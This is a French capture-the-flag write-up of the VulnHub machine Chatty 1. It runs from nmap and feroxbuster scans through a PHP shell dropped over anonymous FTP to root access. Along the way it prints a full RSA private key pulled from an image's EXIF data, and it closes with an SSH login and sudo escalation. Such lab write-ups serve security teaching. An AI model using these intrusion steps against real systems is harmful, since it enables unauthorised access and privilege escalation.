Shared root
Chatty 1 est un CTF simple proposé sur VulnHub.
Il a trois ports ouverts, le reste n’est pas filtré.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
$ sudo nmap -p- -T5 --script vuln -sCV 192.168.56.140
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-21 16:40 CEST
Nmap scan report for 192.168.56.140
Host is up (0.00014s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| vulners:
| vsftpd 3.0.3:
| CVE-2021-30047 7.5 https://vulners.com/cve/CVE-2021-30047
|_ CVE-2021-3618 7.4 https://vulners.com/cve/CVE-2021-3618
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| vulners:
| cpe:/a:openbsd:openssh:7.6p1:
| 95499236-C9FE-56A6-9D7D-E943A24B633A 10.0 https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A *EXPLOIT*
| 5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A 10.0 https://vulners.com/githubexploit/5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A *EXPLOIT*
| 2C119FFA-ECE0-5E14-A4A4-354A2C38071A 10.0 https://vulners.com/githubexploit/2C119FFA-ECE0-5E14-A4A4-354A2C38071A *EXPLOIT*
--- snip ---
| SSH_ENUM 5.0 https://vulners.com/canvas/SSH_ENUM *EXPLOIT*
| PACKETSTORM:150621 5.0 https://vulners.com/packetstorm/PACKETSTORM:150621 *EXPLOIT*
| EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 5.0 https://vulners.com/exploitpack/EXPLOITPACK:F957D7E8A0CC1E23C3C649B764E13FB0 *EXPLOIT*
| EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 5.0 https://vulners.com/exploitpack/EXPLOITPACK:EBDBC5685E3276D648B4D14B75563283 *EXPLOIT*
| CVE-2025-32728 4.3 https://vulners.com/cve/CVE-2025-32728
| CVE-2021-36368 3.7 https://vulners.com/cve/CVE-2021-36368
| PACKETSTORM:151227 0.0 https://vulners.com/packetstorm/PACKETSTORM:151227 *EXPLOIT*
| PACKETSTORM:140261 0.0 https://vulners.com/packetstorm/PACKETSTORM:140261 *EXPLOIT*
|_ 1337DAY-ID-30937 0.0 https://vulners.com/zdt/1337DAY-ID-30937 *EXPLOIT*
80/tcp open http nginx 1.15.7
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| vulners:
| nginx 1.15.7:
| 95499236-C9FE-56A6-9D7D-E943A24B633A 10.0 https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A *EXPLOIT*
| 2C119FFA-ECE0-5E14-A4A4-354A2C38071A 10.0 https://vulners.com/githubexploit/2C119FFA-ECE0-5E14-A4A4-354A2C38071A *EXPLOIT*
| 3F71F065-66D4-541F-A813-9F1A2F2B1D91 8.8 https://vulners.com/githubexploit/3F71F065-66D4-541F-A813-9F1A2F2B1D91 *EXPLOIT*
--- snip ---
| CVE-2019-20372 5.3 https://vulners.com/cve/CVE-2019-20372
|_ PACKETSTORM:162830 0.0 https://vulners.com/packetstorm/PACKETSTORM:162830 *EXPLOIT*
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-server-header: nginx/1.15.7
|_http-dombased-xss: Couldn't find any DOM based XSS.
MAC Address: 08:00:27:8B:1F:03 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.84 seconds
Je trouve un dossier sur le serveur web à l’aide de feroxbuster
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
$ feroxbuster -u http://192.168.56.140/ -w DirBuster-0.12/directory-list-2.3-big.txt -n
___ ___ __ __ __ __ __ ___
|__ |__ |__) |__) | / ` / \ \_/ | | \ |__
| |___ | \ | \ | \__, \__/ / \ | |__/ |___
by Ben "epi" Risher 🤓 ver: 2.4.0
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.56.140/
🚀 Threads │ 50
📖 Wordlist │ DirBuster-0.12/directory-list-2.3-big.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.4.0
🚫 Do Not Recurse │ true
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
WLD 7l 9w 153c Got 403 for http://192.168.56.140/e253ba522c624b47a7b802313681f54b (url length: 32)
WLD - - - Wildcard response is static; auto-filtering 153 responses; toggle this behavior by using --dont-filter
WLD 7l 9w 153c Got 403 for http://192.168.56.140/e87ae1ec6cb3493ba2034d6767782075cdb6241141c24b0ab36266f4d1a8ee188e68afd6dfef495e878e28367da88d57 (url length: 96)
301 7l 11w 169c http://192.168.56.140/zamowienie
[####################] - 2m 1273561/1273561 0s found:3 errors:0
[####################] - 2m 1273563/1273561 8609/s http://192.168.56.140/
Plus d’énumération me remonte d’autres dossiers :
1
2
3
301 7l 11w 169c http://192.168.56.140/zamowienie/data
301 7l 11w 169c http://192.168.56.140/zamowienie/css
301 7l 11w 169c http://192.168.56.140/zamowienie/js
J’ai aussi jeté un œil au service FTP qui accepte les connexions anonymes, et ça tombe bien : la racine FTP correspond à ce dossier zamowienie
. Le sous dossier data
est world writable, je dépose donc un shell PHP.
Une fois reverse-ssh
lancé sur la machine, je découvre un compte jpeguser
.
Vu que le dossier zamowienie
contient une image JPEG, ça incite à lancer stegoveritas
sur le fichier. Il me trouve en effet des informations utiles que l’on peut aussi obtenir via exiftool
:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
$ exiftool tech-042712-004.jpg
ExifTool Version Number : 13.31
File Name : tech-042712-004.jpg
--- snip ---
URL : ssh://UID=1001@this-host
--- snip ---
Creator : roberto saporito
Description : Hacker World
Title : 136205219
Credit : Getty Images/iStockphoto
Instructions : -----BEGIN RSA PRIVATE KEY-----MIIEpAIBAAKCAQEA6fy0zQWsk5yrDim+kmwlrf2yG5LpyYyNWp72egWKHtwmMDWUX306JC60WXkmduPHxuaKQ75DULMlHRXJSq/4YBFmirp1TmPpY2JNzRBVYo2Hm/0tJZUUT62iMFa/1yC51XVldqUV9307XFOWtedVrEFA4YLlYElSOUlmKyp1rbFv+XDFpprMpSA6+oclUM9xTrDRF3z/Rr36g+TZvm+bsOip+0+p+SQMswySLGsH/7hvvJ4lhM1D0UNQrgHJEmmm/UA2rqSKN1PTrdUOedPjdV9kUQXyb5/MM+y1oT1rlUVOmWHOwu31x0NsbDndEEFaXJrE/XKW0EpLk6b4KVTCHQIDAQABAoIBAHvZr9WJeFRVq9D+VYnpRnR3AUxJEggFplheJbZmsjotauU/pv54KUs3kWx+jNaHMJpeMrcywSy49h8UBgzLYdtvumgZ07efeMyLHwU47QkSQsJVWw02gJ7AGEYf1MFI6DRNRFxte1gZaE8xS2eTQCzCCVaUU1cI2EXMTRDyE4HQk4jRRPUqEdhIbgJmwdHHFuVqvU24DBM/4TKj8N5Dg1PJx3H9n14HqOIRBTrryh2S3d5JljNafaUJGRqTeD7R3bXvABvZgEKDc5kwXrre53kfBLfZr8RjjYuUpbEV7t9YY3NMkfnbdnRYFHRE/Dk/i9aLdJhlHOTMI4JC3QGKXR0CgYEA95f5DS610T+nWp7nRh1pRc3OqQTKhYqEgJ9AsqEW/uO8xqOTyWnUMD3N7VBWgXhitdzQlrE9ZZsMeBoe9OVimfzwahi5fmXbSIo0REgys47uv/t1jDme8DKJiKOIBxRk4qpM9IRDjx8sYmQvWh35Xna0xOdlf2+9AdLRE1oQySsCgYEA8e53/suTEqe0U48MkXb6Jz+40Q3ABONBxnKuLaMNOQ2TH4q8UTzz16IyNs/HHiy7gX+S1xNgv2O8MRJugj4WxfqaEdyJ9pndocxJpEJ1Wwci9I/Jxet4xnZuOpCInolecvJ0MsNYTDkudt/Y2y2lgD2MAHxaWVTmHB7huMN97dcCgYEA08SCWgoXrM+a3mGHQmspfXDYT6wvZCTjy/dqKN6rgntbHTMP1nfT6ycRmObb9oT3OMGTDzCtaNhCw/7jd2cy/K5hGv3muft4oQTES5rM8tNP1ZjII5WtIZi4Fcx5LkT9PPmYNJNkDWgGWGmELrnwbiFt3/Ri1arGqGaeOMUSEl0CgYEAlUJr083jCgJfdaHuvhwqT2a37npOOnW+0eFU5qEO+mEOoMomTvSM+D+APWLJVSuB7242uOyiptGwfJIDjeUihbiLr3Nhxru9CiKQWIAMCUII5duEP9B77e2JKiabszvLAp3k5KCybCxnJz4Je4fY8JqIMpCF6VFAup6u4h/yJHcCgYB6GKXdQtukguvq5ahhe6oLSpVj5dkE7bSHu3cGIt/7km0DETzjS34UkaYsjJYUvuS0F8k3aJuUtBZtTS5DmPtKWJ5zKMNvGMvfvW7sZwLjThFuPbIk1xnTeQFCbWOSEo1Ow2GGNR6qbJ79W/mMDrFtkHyXTNSxSHkq2h/F+jvfMw==-----END RSA PRIVATE KEY-----
Source : iStockphoto
Document ID : adobe:docid:photoshop:3a6116d4-3f61-11e1-9aee-e5feb9136a43
Web Statement : http://www.gettyimages.com
DCT Encode Version : 100
--- snip ---
Au passage, j’ai remarqué que parmi les ports en écoute (une fois le shell obtenu), il y a SNMP sur le port UDP 161. De plus snmpwalk
est présent sur le système.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
www-data@ctflabs-chatty1:/$ snmpwalk -v 2c -c public 127.0.0.1
iso.3.6.1.2.1.1.1.0 = STRING: "Linux ctflabs-chatty1 4.15.0-39-generic #42-Ubuntu SMP Tue Oct 23 15:48:01 UTC 2018 x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (138055) 0:23:00.55
iso.3.6.1.2.1.1.4.0 = STRING: "Me <me@example.org>"
iso.3.6.1.2.1.1.5.0 = STRING: "ctflabs-chatty1"
iso.3.6.1.2.1.1.6.0 = STRING: "Sitting on the Dock of the Bay"
iso.3.6.1.2.1.1.7.0 = INTEGER: 72
iso.3.6.1.2.1.1.8.0 = Timeticks: (17) 0:00:00.17
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (17) 0:00:00.17
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (17) 0:00:00.17
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (17) 0:00:00.17
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (17) 0:00:00.17
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (17) 0:00:00.17
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (17) 0:00:00.17
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (17) 0:00:00.17
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (17) 0:00:00.17
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (17) 0:00:00.17
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (17) 0:00:00.17
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (147795) 0:24:37.95
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 07 15 0C 03 00 00 2D 03 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-4.15.0-39-generic root=/dev/mapper/VGDisk-home ro net.ifnames=0 biosdevname=0
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 112
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
iso.3.6.1.2.1.25.1.7.0 = No more variables left in this MIB View (It is past the end of the MIB tree)
Spellcheck
À ce stade, autant oublier ça et se concentrer sur la clé RSA extraire des Exif.
1
2
3
$ ssh -i jpeguser.key jpeguser@192.168.56.140
Load key "jpeguser.key": error in libcrypto
jpeguser@192.168.56.140's password:
La clé n’est pas bien formatée avec les espaces et retours à la ligne ont été supprimés.
J’ai demandé à Claude AI de remettre au propre et ça marchait :
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
$ ssh -i jpeguser.key jpeguser@192.168.56.140
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-39-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Mon Jul 21 12:26:49 -03 2025
System load: 0.08 Processes: 118
Usage of /: 40.0% of 8.24GB Users logged in: 0
Memory usage: 43% IP address for eth0: 192.168.56.140
Swap usage: 0%
=> There is 1 zombie process.
166 packages can be updated.
97 updates are security updates.
Last login: Thu Nov 29 15:49:16 2018 from 192.168.0.82
$ sudo -l
Matching Defaults entries for jpeguser on ctflabs-chatty1:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jpeguser may run the following commands on ctflabs-chatty1:
(ALL : ALL) NOPASSWD: ALL
$ sudo su
root@ctflabs-chatty1:/home/jpeguser# cd /root
root@ctflabs-chatty1:~# ls
flag.txt
root@ctflabs-chatty1:~# cat flag.txt
Congratulations you got the flag!
Let me know what you thought on twitter. I'm @helvioju
I'm always working on new challenges. Follow me for updates.
My Best Regards
Helvio Junior (M4v3r1cK)